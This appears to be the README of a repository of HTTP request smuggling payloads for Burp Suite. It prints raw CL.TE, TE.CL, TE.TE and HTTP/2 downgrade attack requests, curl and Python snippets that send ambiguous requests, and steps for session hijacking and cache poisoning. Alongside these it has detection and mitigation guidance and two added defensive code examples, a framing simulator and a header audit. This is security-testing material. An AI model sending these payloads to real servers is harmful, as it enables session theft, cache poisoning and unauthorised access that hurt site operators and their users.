A comprehensive collection of HTTP Request Smuggling payloads for security testing and research.
- About
- What is HTTP Request Smuggling?
- Vulnerability Types
- Payload Categories
- Installation
- Usage
- Burp Suite Integration
- Testing Methodology
- Detection Techniques
- Mitigation
- Contributing
- Disclaimer
- References
- License
This repository contains a comprehensive collection of HTTP Request Smuggling payloads designed for security testing, penetration testing, and vulnerability research. All payloads are organized in categories and ready to be used with Burp Suite Intruder and other security testing tools.
- 732+ Unique Payloads - Extensive collection covering all major techniques
- Categorized & Organized - Easy to find the right payload for your test case
- Burp Suite Ready - Pre-formatted for Intruder attacks
- HTTP/1.1 & HTTP/2 - Support for both protocol versions
- Real-world Examples - Based on actual vulnerabilities and research
- Regular Updates - Continuously updated with new techniques
HTTP Request Smuggling is a critical web security vulnerability that exploits inconsistencies in how front-end and back-end servers parse HTTP request boundaries. When the front-end server (like a proxy, load balancer, or CDN) and back-end server disagree on where one request ends and another begins, attackers can:
- Bypass security controls (WAFs, authentication, access controls)
- Poison web caches with malicious content
- Hijack user sessions and credentials
- Execute stored XSS attacks
- Gain unauthorized access to internal systems
Client → Front-End Server → Back-End Server

- Attacker sends an ambiguous HTTP request
- Front-end interprets it as one request
- Back-end interprets it as two requests
- Second request gets prepended to the next legitimate user's request
- Attacker can manipulate other users' requests
CL.TE: Front-end uses Content-Length, back-end uses Transfer-Encoding: chunked

Attack Vector:

```http
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```

TE.CL: Front-end uses Transfer-Encoding: chunked, back-end uses Content-Length

Attack Vector:

```http
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4

5c
GPOST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 15

x=1
0

```

TE.TE: Both servers support Transfer-Encoding, but can be tricked with obfuscation

Attack Vector:

```http
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Transfer-Encoding: x

0

GET /404 HTTP/1.1
X: Y
```

Common Obfuscation Techniques:

- `Transfer-Encoding:  chunked` (extra space)
- `Transfer-encoding: chunked` (case variation)
- `Transfer-Encoding : chunked` (space before colon)
- `Transfer-Encoding: chunked ` (trailing space)
- `Transfer-Encoding:[tab]chunked` (tab character)
- `Transfer-Encoding: xchunked`
- `Transfer-Encoding: chunked, identity`
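The three variants above all come down to one question: when a request carries both `Content-Length` and `Transfer-Encoding`, which header decides where the body ends? The following is an added example, not code from this repository, that frames the same connection buffer the way a Content-Length-first parser (a CL.TE front-end) and a chunked-first parser (an RFC 9112 back-end) would, using the CL.TE request quoted above. The follow-on `GET /account` request from a second user, the `frame()` helper and its policy names are constructed for the example. The `"strict"` policy shows the fix: a server that sees both headers refuses to guess and rejects the request.

```python
"""Added example (not part of the payload repository): frame one HTTP/1.1
connection buffer under different header-precedence policies and show that
a CL.TE request splits differently depending on which header wins."""

from __future__ import annotations


class AmbiguousRequest(ValueError):
    """Raised by the "strict" policy when a request carries both framing headers."""


def _parse_head(buf: bytes):
    """Return (request_line, [(name, value), ...], body_offset), or None when the
    header block is not complete yet."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        return None
    lines = buf[:end].decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, end + 4


def _read_chunked(buf: bytes, pos: int):
    """Decode a chunked body starting at pos. Returns (body, end_offset), or None
    when the body is incomplete or malformed. Trailer fields are not supported."""
    body = b""
    while True:
        nl = buf.find(b"\r\n", pos)
        if nl < 0:
            return None
        try:
            size = int(buf[pos:nl].split(b";")[0].strip(), 16)
        except ValueError:          # not a chunk-size line: stop framing here
            return None
        pos = nl + 2
        if size == 0:
            if buf[pos:pos + 2] != b"\r\n":   # expect an empty trailer section
                return None
            return body, pos + 2
        if len(buf) < pos + size + 2:
            return None
        body += buf[pos:pos + size]
        pos += size + 2


def frame(buf: bytes, policy: str):
    """Split a connection buffer into (request_line, body) messages.

    policy "cl":     Content-Length wins even when Transfer-Encoding is present
                     (what the front-end does in a CL.TE setup)
    policy "te":     Transfer-Encoding: chunked wins when present (what RFC 9112
                     requires, and what the back-end does in a CL.TE setup)
    policy "strict": like "te", but a request carrying BOTH headers is rejected
                     instead of guessed at (the "reject ambiguous requests" fix)
    Returns (messages, leftover); leftover holds bytes that do not yet form a
    complete message and would be treated as the start of the next request.
    """
    messages = []
    while True:
        head = _parse_head(buf)
        if head is None:
            return messages, buf
        request_line, headers, pos = head
        cl = [v for n, v in headers if n == "content-length"]
        te = [v for n, v in headers if n == "transfer-encoding"]
        if policy == "strict" and cl and te:
            raise AmbiguousRequest(f"both Content-Length and Transfer-Encoding in {request_line!r}")
        chunked = bool(te) and te[-1].lower() == "chunked"
        if chunked and policy in ("te", "strict"):
            decoded = _read_chunked(buf, pos)
            if decoded is None:
                return messages, buf
            body, end = decoded
        else:
            length = int(cl[0]) if cl else 0
            if len(buf) < pos + length:
                return messages, buf
            body, end = buf[pos:pos + length], pos + length
        messages.append((request_line, body))
        buf = buf[end:]


# The CL.TE request quoted on this page (13-byte body: "0" CRLF CRLF "SMUGGLED").
CL_TE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable-website.com\r\n"
    b"Content-Length: 13\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"SMUGGLED"
)
# Constructed: a second user's request that shares the same upstream connection.
NEXT_USER_REQUEST = b"GET /account HTTP/1.1\r\nHost: vulnerable-website.com\r\n\r\n"


if __name__ == "__main__":
    stream = CL_TE_REQUEST + NEXT_USER_REQUEST
    for policy in ("cl", "te"):
        msgs, left = frame(stream, policy)
        print(policy, msgs, left)
    try:
        frame(stream, "strict")
    except AmbiguousRequest as exc:
        print("strict:", exc)
```

Under `"cl"` the buffer is two clean requests. Under `"te"` the POST ends at the `0` chunk and the back-end sees `SMUGGLEDGET /account HTTP/1.1` as the next request line, which is the prefix poisoning described in the overview. Under `"strict"` the ambiguous request never reaches the framing logic at all.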
HTTP/2 to HTTP/1.1 downgrade vulnerabilities

Attack Vector:

```http
POST / HTTP/2
Host: vulnerable-website.com
Content-Length: 0

GET /admin HTTP/1.1
Host: vulnerable-website.com
```

- File: `Intruder/Detection-Payloads.txt`
  - Description: Basic payloads for detecting request smuggling vulnerabilities
  - Use Case: Initial reconnaissance and vulnerability confirmation
- File: `Intruder/CL-TE-Payloads.txt`
  - Description: Payloads targeting CL.TE vulnerabilities
  - Use Case: Front-end uses Content-Length, back-end uses Transfer-Encoding
- File: `Intruder/TE-CL-Payloads.txt`
  - Description: Payloads targeting TE.CL vulnerabilities
  - Use Case: Front-end uses Transfer-Encoding, back-end uses Content-Length
- File: `Intruder/TE-TE-Payloads.txt`
  - Description: Obfuscated Transfer-Encoding headers
  - Use Case: Both servers process Transfer-Encoding differently
- File: `Intruder/Cache-Poisoning-Payloads.txt`
  - Description: Payloads for web cache poisoning attacks
  - Use Case: Poisoning CDN/proxy caches with malicious responses
- File: `Intruder/Session-Hijacking-Payloads.txt`
  - Description: Payloads for capturing/hijacking user sessions
  - Use Case: Stealing authentication tokens and session data
- File: `Intruder/Bypass-Payloads.txt`
  - Description: Payloads for bypassing security controls
  - Use Case: Accessing restricted endpoints, bypassing WAF/authentication
- File: `Intruder/HTTP2-Desync-Payloads.txt`
  - Description: HTTP/2 downgrade and desynchronization attacks
  - Use Case: HTTP/2 to HTTP/1.1 conversion vulnerabilities
- File: `Intruder/Advanced-Payloads.txt`
  - Description: Complex multi-stage attacks and edge cases
  - Use Case: Advanced exploitation scenarios
- File: `Intruder/Time-Based-Payloads.txt`
  - Description: Time-delay based detection techniques
  - Use Case: Blind detection when no direct feedback is available
```bash
git clone https://github.com/payload-box/http-request-smuggling-payloads.git
cd http-request-smuggling-payloads
```

```bash
# Download all Intruder payloads
cd Intruder/

# Or download specific categories
wget https://raw.githubusercontent.com/payload-box/http-request-smuggling-payloads/main/Intruder/CL-TE-Payloads.txt
```

- Detection Phase - Use `Detection-Payloads.txt` to identify vulnerability
- Vulnerability Type Identification - Determine CL.TE, TE.CL, or TE.TE
- Exploitation - Use category-specific payloads
- Impact Analysis - Test cache poisoning, session hijacking, etc.
```bash
# Using curl
# $'...' is bash ANSI-C quoting: \r\n become real CRLF bytes, so the body is
# exactly the 6 bytes the Content-Length header declares. Inside plain double
# quotes curl would send the backslashes literally and the lengths would not match.
curl -X POST https://target.com/ \
  -H "Content-Length: 6" \
  -H "Transfer-Encoding: chunked" \
  -d $'0\r\n\r\nX'
```

```python
# Using Python
import requests

# Body is 6 bytes ("0" CRLF CRLF "X"), matching the declared Content-Length.
headers = {
    'Content-Length': '6',
    'Transfer-Encoding': 'chunked'
}
data = "0\r\n\r\nX"
response = requests.post('https://target.com/', headers=headers, data=data)
```
- Open Burp Suite and capture a request
- Send to Intruder (Ctrl+I)
- Configure Attack Type:
  - Type: `Sniper` or `Battering Ram`
  - Position: Select the entire request body or specific headers
- Load Payloads:
  - Go to Payloads tab
  - Payload type: `Simple list`
  - Click Load → Select payload file (e.g., `CL-TE-Payloads.txt`)
- Configure Options:
  - Redirections: Never follow redirections
  - Grep: Add patterns to detect successful smuggling:
    - `404 Not Found`
    - `Unrecognized method`
    - Response time anomalies
- Start Attack and analyze responses
- Send request to Repeater (Ctrl+R)
- Manually paste payloads from files
- Send twice to test if second request is affected
- Observe differences in response times, status codes, headers
Use specialized Burp extensions:
- HTTP Request Smuggler by PortSwigger
- Turbo Intruder for timing-based attacks
- Logger++ for detailed analysis
- Identify architecture (proxy/load balancer + backend)
- Determine HTTP version support (HTTP/1.1, HTTP/2)
- Check for Connection: keep-alive support
- Test if multiple requests can be pipelined
Technique 1: Time-based Detection

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

1
A
Q
```

Send this twice. If the second request delays, smuggling is possible.

Technique 2: Differential Responses

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 44
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X
```

If you get a 404 response, smuggling succeeded.
Select appropriate payload category based on detection results:

- CL.TE → Use `CL-TE-Payloads.txt`
- TE.CL → Use `TE-CL-Payloads.txt`
- TE.TE → Use `TE-TE-Payloads.txt`

Test for:

- Bypassing front-end security controls
- Cache poisoning (CDN/proxy)
- Session hijacking
- Request routing manipulation
- Internal endpoint access
Send a payload with a timeout and measure response time:

```http
POST / HTTP/1.1
Content-Length: 4
Transfer-Encoding: chunked

1
A
Q
```

Indicators:

- Second request delays by ~30 seconds
- Backend waits for remaining data

Inject a request to a non-existent resource:

```http
0

GET /doesnotexist HTTP/1.1
Foo: bar
```

Indicators:

- 404 response received
- Different status code than normal

Inject custom headers and check reflection:

```http
0

GET / HTTP/1.1
X-Smuggled-Header: test
```

Indicators:

- Custom header appears in logs
- Header reflected in response

Monitor connection behavior:

- Unexpected connection resets
- Connection kept alive when it shouldn't be
- Multiple responses for single request
- Disable HTTP/1.1 keep-alive on backend servers
- Normalize requests - ensure front-end and back-end parse identically
- Reject ambiguous requests - requests with both CL and TE
- Use HTTP/2 end-to-end (avoid downgrade)
- Update servers to latest versions with fixes
- Strict parsing - reject malformed requests
- Configuration Review:

  ```nginx
  # Nginx - Disable HTTP/1.1 pipelining
  keepalive_requests 1;
  keepalive_timeout 0;
  ```

  ```apache
  # Apache - Disable keep-alive
  KeepAlive Off
  ```

- Deploy WAF rules to detect smuggling patterns
- Monitor logs for suspicious patterns:
  - Malformed Content-Length
  - Multiple Transfer-Encoding headers
  - Unusual chunk sizes
- Network segmentation - isolate front-end and back-end
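The monitoring item above lists the patterns worth alerting on (malformed Content-Length, multiple Transfer-Encoding headers, unusual chunk sizes), and the TE.TE section lists the Transfer-Encoding obfuscations that those alerts should also catch. The following is an added example, not code from this repository, of a header-level audit that a proxy log hook or a WAF rule test could run over raw requests. `audit_request()`, `scan()` and the `example.test` hosts are constructed for the example; the CL.TE and TE.TE samples are the requests quoted on this page.

```python
"""Added example (not part of the payload repository): flag the request
smuggling indicators in raw HTTP/1.1 requests. Sample requests are constructed."""

import re

# Only this exact line is treated as clean. Any other spelling (extra or tab
# whitespace, a space before the colon, an unknown coding, "chunked, identity",
# or even a case variant) is what a front-end/back-end pair may disagree on, so
# it is logged even where the spec itself tolerates the variant.
_CANONICAL_TE_LINE = "Transfer-Encoding: chunked"
_HEX = re.compile(r"^[0-9A-Fa-f]+$")


def _audit_chunks(body: bytes) -> list:
    """Walk a chunked body and report chunk-size lines that are not plain hex,
    chunk extensions, sizes that run past the data, and bytes left over after
    the final chunk (the part a chunked parser would treat as the next request)."""
    findings, pos = [], 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            findings.append("chunked body has no terminating 0 chunk")
            return findings
        size_line = body[pos:nl].decode("latin-1")
        size_token = size_line.split(";")[0]
        if not _HEX.match(size_token):
            findings.append(f"unusual chunk-size line {size_line!r}")
            return findings
        if size_token != size_line:
            findings.append(f"chunk extension on {size_line!r}")
        size = int(size_token, 16)
        pos = nl + 2
        if size == 0:
            trailer = body[pos:]
            if trailer.startswith(b"\r\n"):
                leftover = trailer[2:]        # bytes after the empty trailer section
            elif trailer.endswith(b"\r\n\r\n"):
                leftover = b""                # a real trailer section; not inspected here
            else:
                leftover = trailer
            if leftover:
                findings.append(f"{len(leftover)} byte(s) after the final chunk: {leftover[:16]!r}")
            return findings
        pos += size + 2
        if pos > len(body):
            findings.append(f"chunk of size {size} runs past the end of the body")
            return findings


def audit_request(raw: bytes) -> list:
    """Return the smuggling indicators found in one raw HTTP/1.1 request
    (an empty list means nothing suspicious)."""
    findings = []
    head, sep, body = raw.partition(b"\r\n\r\n")
    header_lines = head.decode("latin-1").split("\r\n")[1:]
    cl_values, te_lines = [], []
    for line in header_lines:
        name, _, value = line.partition(":")
        canon = name.strip().lower()   # tolerant match so obfuscated names are still seen
        if canon == "content-length":
            cl_values.append(value.strip())
        elif canon == "transfer-encoding":
            te_lines.append(line)
    if cl_values and te_lines:
        findings.append("both Content-Length and Transfer-Encoding present")
    if len(cl_values) > 1:
        findings.append("multiple Content-Length headers")
    for value in cl_values:
        if not value.isdigit():
            findings.append(f"malformed Content-Length value {value!r}")
    if len(te_lines) > 1:
        findings.append("multiple Transfer-Encoding headers")
    for line in te_lines:
        if line != _CANONICAL_TE_LINE:
            findings.append(f"non-canonical Transfer-Encoding line {line!r}")
    if te_lines and sep:
        findings.extend(_audit_chunks(body))
    return findings


def scan(captured: dict) -> dict:
    """Audit a batch of captured requests; returns only the ones with findings."""
    report = {}
    for name, raw in captured.items():
        findings = audit_request(raw)
        if findings:
            report[name] = findings
    return report


SAMPLES = {
    # constructed ordinary form post: no findings expected
    "clean": b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 3\r\n\r\nx=1",
    # the CL.TE request quoted on this page
    "cl_te": b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\nContent-Length: 13\r\n"
             b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED",
    # the TE.TE request quoted on this page (second header carries a bogus coding)
    "te_te": b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\nTransfer-Encoding: chunked\r\n"
             b"Transfer-Encoding: x\r\n\r\n0\r\n\r\nGET /404 HTTP/1.1\r\nX: Y",
    # constructed: tab after the colon, one of the obfuscations listed on this page
    "tab": b"POST / HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding:\tchunked\r\n\r\n5\r\nhello\r\n0\r\n\r\n",
    # constructed: non-numeric Content-Length
    "bad_cl": b"GET / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 4a\r\n\r\n",
}

if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        print(name, findings)
```

The audit works on the raw header lines rather than on a parsed header map on purpose: once a proxy has normalised the header into a dictionary, the whitespace and duplicate-header details that distinguish a TE.TE probe from a normal chunked upload are gone.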
Run detection payloads against your infrastructure:

```bash
# Test with detection payloads
python smuggler.py -u https://your-site.com
```

Contributions are welcome! Please follow these guidelines:
- Fork the repository
- Create a feature branch (`git checkout -b feature/new-payloads`)
- Add your payloads with proper categorization
- Test payloads in a controlled environment
- Commit changes (`git commit -am 'Add new CL.TE payloads'`)
- Push to branch (`git push origin feature/new-payloads`)
- Create a Pull Request

- Test payloads before submitting
- Add description/comments for complex payloads
- Categorize correctly
- Follow existing format
- Avoid duplicates
IMPORTANT LEGAL NOTICE
This repository is intended for:
- Authorized security testing with explicit permission
- Educational purposes and security research
- Bug bounty programs within scope
- Defensive security and protection
DO NOT:
- Use against systems without authorization
- Use for illegal activities
- Use to cause harm or disruption
Legal Warning: Unauthorized access to computer systems is illegal under laws such as:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act - UK
- Cybercrime laws in various jurisdictions
The authors and contributors are NOT responsible for any misuse or damage caused by this repository. Users are solely responsible for ensuring their testing activities are legal and authorized.
By using this repository, you agree to:
- Obtain proper authorization before testing
- Comply with all applicable laws and regulations
- Use responsibly and ethically
- Take full responsibility for your actions
- HTTP Desync Attacks: Request Smuggling Reborn - James Kettle
- HTTP/2: The Sequel is Always Worse - James Kettle
- Browser-Powered Desync Attacks - James Kettle
- Practical HTTP Header Smuggling
- Burp Suite - Web vulnerability scanner
- HTTP Request Smuggler - Burp extension
- Smuggler.py - Python-based testing tool
- h2csmuggler - HTTP/2 smuggling tool
- CVE-2020-11724 - Nginx
- CVE-2020-5902 - F5 BIG-IP
- CVE-2019-16254 - Puma web server
- CVE-2019-9516 - HTTP/2 implementation issues
- RFC 7230 - HTTP/1.1 Message Syntax and Routing
- RFC 7540 - HTTP/2 Specification
- RFC 9112 - HTTP/1.1 (Updated 2022)
- PortSwigger Web Security Academy
- OWASP Testing Guide
- HackerOne Reports
- PentesterLab - Request Smuggling exercises
| Category | Payloads | Last Updated |
|---|---|---|
| Detection | 59 | 2026 |
| CL.TE | 102 | 2026 |
| TE.CL | 134 | 2026 |
| TE.TE | 134 | 2026 |
| Cache Poisoning | 20 | 2026 |
| Session Hijacking | 52 | 2026 |
| Bypass | 72 | 2026 |
| HTTP/2 | 55 | 2026 |
| Advanced | 64 | 2026 |
| Time-based | 40 | 2026 |
| TOTAL | 732+ | 2026 |
- Issues: GitHub Issues
- Discussions: GitHub Discussions
- Security: Report vulnerabilities responsibly
This project is licensed under the MIT License - see the LICENSE file for details.
MIT License
Copyright (c) 2026 Payload Box
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
If you find this repository useful, please consider giving it a star!

Made with ❤️ by security researchers, for security researchers